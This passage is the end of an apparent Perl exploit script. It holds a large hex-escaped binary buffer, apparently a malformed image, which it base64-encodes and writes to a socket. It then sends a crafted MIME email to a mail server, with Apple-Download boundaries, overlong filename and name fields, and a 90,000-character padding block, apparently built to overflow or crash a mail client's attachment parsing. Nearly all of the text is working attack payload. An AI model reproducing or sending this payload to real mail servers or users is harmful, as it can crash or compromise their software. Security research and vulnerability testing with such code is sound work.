"\xec\xec\xff\xec\xec\xec\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
"\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
"\xe1\xe1\xff\xe1\xe1\xe1\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6".
"\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6".
"\xe6\xe6\xff\xe6\xe6\xe6\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9".
"\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9".
"\xe9\xe9\xff\xe9\xe9\xe9\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
"\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
"\xec\xec\xff\xec\xec\xec\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef".
"\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef".
"\xef\xef\xff\xef\xef\xef\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3".
"\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3".
"\xf3\xf3\xff\xf3\xf3\xf3\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6".
"\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6".
"\xf6\xf6\xff\xf6\xf6\xf6\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8".
"\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8".
"\xf8\xf8\xff\xf8\xf8\xf8\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc".
"\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc".
"\xfc\xfc\xff\xfc\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00".
"\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00".
"\x00\x00\xa8\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00".
"\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00".
"\x00\x00\x2a\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00".
"\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00".
"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00\x5f\xd0\xac\x12\xc2".
"\x00\x00\x00\x1c\x00\x32\x00\x00\x75\x73\x72\x6f\x00\x00\x00\x0a".
"\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c";
print $sock encode_base64($bufferz) .
"\r\n" .
"--Apple-Download-4-188295813\r\n" .
"Content-Transfer-Encoding: 8bit\r\n" .
"Content-Id: <436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D\Remote>\r\n" .
"Content-Type: Internet Download Manager/Download;\r\n" .
"\tx-mac-type=0;\r\n" .
"\tx-unix-mode=0755;\r\n" .
"\tx-mac-creator=0;\r\n" .
"\tname=\"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*0=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE;\r\n" .
#"\r\nFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF!\r\n" .
"\r\n" . "Z" x 90000 . "\r\n" .
"--Apple-Download-4-188295813--\r\n" .
"\r\n" .
"--Apple-Download-3-188295813--\r\n" .
".\r\n";
sleep 2;